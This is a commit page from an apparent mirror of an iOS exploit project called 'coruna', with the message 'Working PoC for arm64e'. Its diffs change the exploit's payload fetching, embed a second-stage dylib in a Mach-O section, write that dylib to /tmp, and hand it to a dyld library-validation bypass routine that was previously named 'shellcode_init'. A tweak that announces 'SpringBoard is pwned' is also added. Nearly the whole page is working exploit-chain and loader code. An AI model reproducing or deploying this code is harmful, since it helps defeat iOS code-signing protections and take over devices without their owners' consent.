mirror of
https://github.com/khanhduytran0/coruna.git
synced 2026-04-24 04:36:28 +02:00
Working PoC for arm64e
This commit is contained in:
khanhduytran0
+1
-1
@@ -1161,7 +1161,7 @@ function YA() {/* Original: YA → resolveSymbols */
|
||||
// Fetch a single file as ArrayBuffer
|
||||
fetchBin(url) {
|
||||
// Override entry2_type0x0f.dylib
|
||||
url = url.replace(/\/entry2_type0x0f.dylib$/g, "/../../SpringBoardTweak/.theos/obj/arm64" + (platformModule.platformState.hasPAC?"e":"") + "/SpringBoardTweak.dylib");
|
||||
url = url.replace(/\/entry2_type0x0f.dylib$/g, "/../../TweakLoader/.theos/obj/arm64" + (platformModule.platformState.hasPAC?"e":"") + "/TweakLoader.dylib");
|
||||
|
||||
window.log("Downloading " + url);
|
||||
return new Promise((resolve, reject) => {
|
||||
|
||||
@@ -0,0 +1,18 @@
|
||||
TARGET := iphone:clang:latest:15.0
|
||||
ARCHS = arm64 arm64e
|
||||
FINALPACKAGE = 1
|
||||
STRIP = 0
|
||||
GO_EASY_ON_ME = 1
|
||||
|
||||
include $(THEOS)/makefiles/common.mk
|
||||
|
||||
SUBPROJECTS += SpringBoardTweak
|
||||
include $(THEOS_MAKE_PATH)/aggregate.mk
|
||||
|
||||
LIBRARY_NAME = TweakLoader
|
||||
TweakLoader_FILES = TweakLoader.m lv_bypass.c
|
||||
TweakLoader_CFLAGS = -fno-objc-arc
|
||||
TweakLoader_LDFLAGS = -sectcreate __TEXT __SBTweak $(THEOS_OBJ_DIR)/SpringBoardTweak.dylib
|
||||
TweakLoader_INSTALL_PATH = /usr/local/lib
|
||||
|
||||
include $(THEOS_MAKE_PATH)/library.mk
|
||||
@@ -8,8 +8,8 @@ include $(THEOS)/makefiles/common.mk
|
||||
|
||||
LIBRARY_NAME = SpringBoardTweak
|
||||
|
||||
SpringBoardTweak_FILES = SpringBoardTweak.m lv_bypass.c
|
||||
SpringBoardTweak_CFLAGS = -fno-objc-arc
|
||||
SpringBoardTweak_FILES = SpringBoardTweak.m
|
||||
SpringBoardTweak_CFLAGS = -fobjc-arc
|
||||
SpringBoardTweak_INSTALL_PATH = /usr/local/lib
|
||||
|
||||
include $(THEOS_MAKE_PATH)/library.mk
|
||||
@@ -0,0 +1,15 @@
|
||||
@import UIKit;
|
||||
|
||||
__attribute__((constructor)) static void init() {
|
||||
dispatch_async(dispatch_get_main_queue(), ^{
|
||||
UIAlertController *alert = [UIAlertController alertControllerWithTitle:@"Coruna" message:@"SpringBoard is pwned" preferredStyle:UIAlertControllerStyleAlert];
|
||||
[alert addAction:[UIAlertAction actionWithTitle:@"Install TrollHelper (ETA SON)" style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
|
||||
|
||||
}]];
|
||||
[alert addAction:[UIAlertAction actionWithTitle:@"Respring" style:UIAlertActionStyleDefault handler:^(UIAlertAction * _Nonnull action) {
|
||||
exit(0);
|
||||
}]];
|
||||
[alert addAction:[UIAlertAction actionWithTitle:@"OK" style:UIAlertActionStyleDefault handler:nil]];
|
||||
[[UIApplication sharedApplication].keyWindow.rootViewController presentViewController:alert animated:YES completion:nil];
|
||||
});
|
||||
}
|
||||
@@ -1,6 +1,5 @@
|
||||
@import Darwin;
|
||||
@import MachO;
|
||||
@import UIKit;
|
||||
#include <mach-o/ldsyms.h> /* _mh_dylib_header */
|
||||
|
||||
// Function pointers
|
||||
@@ -8,7 +7,8 @@ extern pthread_t pthread_main_thread_np(void);
|
||||
extern void _pthread_set_self(pthread_t p);
|
||||
void (*_abort)(void);
|
||||
int (*_close)(int);
|
||||
void * (*_dlsym)(void *, const char *);
|
||||
void* (*_dlsym)(void *, const char *);
|
||||
uint8_t* (*_getsectiondata)(const struct mach_header_64 *, const char *, const char *, unsigned long *);
|
||||
thread_t (*_mach_thread_self)(void);
|
||||
int (*_open)(const char *, int, ...);
|
||||
void (*__pthread_set_self)(pthread_t p);
|
||||
@@ -17,45 +17,17 @@ int (*_strncmp)(const char *s1, const char *s2, size_t n);
|
||||
kern_return_t (*_thread_terminate)(mach_port_t);
|
||||
int (*_write)(int, const void *, size_t);
|
||||
|
||||
int shellcode_init(void * (*_dlsym)(void* handle, const char* symbol), const char *next_stage_dylib_path);
|
||||
int dyld_lv_bypass_init(void * (*_dlsym)(void* handle, const char* symbol), const char *next_stage_dylib_path);
|
||||
|
||||
static uintptr_t _get_text_vmaddr(const struct mach_header_64 *mh) {
|
||||
struct load_command *lc = (void*)((uintptr_t)mh + sizeof(struct mach_header_64));
|
||||
for (uint32_t i = 0; i < mh->ncmds; i++, lc = (void*)((uint8_t*)lc + lc->cmdsize)) {
|
||||
if (lc->cmd != LC_SEGMENT_64) continue;
|
||||
struct segment_command_64 *seg = (void*)lc;
|
||||
if (_strncmp(seg->segname, "__TEXT", 6) == 0)
|
||||
return seg->vmaddr;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
static size_t macho_size_from_header(const struct mach_header_64 *mh) {
|
||||
uintptr_t base = (uintptr_t)mh;
|
||||
uintptr_t text_vm = _get_text_vmaddr(mh);
|
||||
uintptr_t slide = base - text_vm; // ASLR slide
|
||||
|
||||
struct load_command *lc = (void*)(base + sizeof(struct mach_header_64));
|
||||
for (uint32_t i = 0; i < mh->ncmds; i++, lc = (void*)((uint8_t*)lc + lc->cmdsize)) {
|
||||
if (lc->cmd != LC_SEGMENT_64) continue;
|
||||
struct segment_command_64 *seg = (void*)lc;
|
||||
if (_strncmp(seg->segname, "__LINKEDIT", 10) != 0) continue;
|
||||
|
||||
// vmaddr + slide = actual mapped address of __LINKEDIT
|
||||
// end = that + vmsize
|
||||
return (seg->vmaddr + slide + seg->vmsize) - base;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
const char *save_myself(void) {
|
||||
const char *path = "/tmp/SpringBoardTweak.dylib";
|
||||
const struct mach_header_64 *header = (struct mach_header_64 *)&_mh_dylib_header;
|
||||
size_t size = macho_size_from_header(header);
|
||||
int fd = _open(path, O_RDWR | O_CREAT | O_TRUNC, 0755);
|
||||
if (fd < 0) _abort();
|
||||
const char *save_actual_dylib(void) {
|
||||
const char *path = "/tmp/actual.dylib";
|
||||
int fd = _open(path, O_CREAT | O_WRONLY | O_TRUNC, 0644);
|
||||
|
||||
if (_write(fd, header, size) != size) {
|
||||
// -sectcreate __TEXT __actual_dylib <path to dylib>
|
||||
|
||||
size_t dylib_size = 0;
|
||||
const char *dylib = (const char *)_getsectiondata((struct mach_header_64 *)&_mh_dylib_header, "__TEXT", "__SBTweak", &dylib_size);
|
||||
if (_write(fd, dylib, dylib_size) != dylib_size) {
|
||||
_abort();
|
||||
}
|
||||
_close(fd);
|
||||
@@ -85,6 +57,7 @@ int last(void) {
|
||||
|
||||
_abort = _dlsym(RTLD_DEFAULT, "abort");
|
||||
_close = _dlsym(RTLD_DEFAULT, "close");
|
||||
_getsectiondata = _dlsym(RTLD_DEFAULT, "getsectiondata");
|
||||
_mach_thread_self = _dlsym(RTLD_DEFAULT, "mach_thread_self");
|
||||
_open = _dlsym(RTLD_DEFAULT, "open");
|
||||
_strncmp = _dlsym(RTLD_DEFAULT, "strncmp");
|
||||
@@ -92,8 +65,8 @@ int last(void) {
|
||||
_write = _dlsym(RTLD_DEFAULT, "write");
|
||||
|
||||
// setup dyld validation bypass
|
||||
const char *path = save_myself();
|
||||
shellcode_init(_dlsym, path);
|
||||
const char *path = save_actual_dylib();
|
||||
dyld_lv_bypass_init(_dlsym, path);
|
||||
|
||||
// should not return
|
||||
_thread_terminate(_mach_thread_self());
|
||||
@@ -1,5 +1,5 @@
|
||||
Package: com.yourcompany.springboardtweak
|
||||
Name: SpringBoardTweak
|
||||
Package: com.yourcompany.TweakLoader
|
||||
Name: TweakLoader
|
||||
Version: 0.0.1
|
||||
Architecture: iphoneos-arm
|
||||
Description: An awesome library of some sort!!
|
||||
@@ -34,7 +34,7 @@ static mach_port_t _mach_task_self_;
|
||||
kern_return_t builtin_vm_protect(mach_port_name_t task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_max, vm_prot_t new_prot);
|
||||
static void init_bypassDyldLibValidation(void);
|
||||
|
||||
int shellcode_init(void * (*_dlsym)(void* handle, const char* symbol),
|
||||
int dyld_lv_bypass_init(void * (*_dlsym)(void* handle, const char* symbol),
|
||||
const char *next_stage_dylib_path)
|
||||
{
|
||||
_printf = _dlsym(RTLD_DEFAULT, "printf");
|
||||
Reference in New Issue
Block a user